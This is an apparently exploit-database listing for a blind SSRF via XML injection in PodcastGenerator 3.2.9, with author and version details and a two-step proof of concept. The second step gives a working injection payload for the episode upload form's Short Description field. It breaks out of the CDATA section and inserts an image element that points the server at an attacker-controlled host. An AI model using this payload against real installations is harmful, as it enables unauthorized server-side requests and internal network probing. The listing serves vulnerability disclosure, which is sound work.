Podcastgenerator 3.2.9 blind ssrf via xml injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-07-03 |
Type : webapps |
Platform : php
This exploit / vulnerability Podcastgenerator 3.2.9 blind ssrf via xml injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'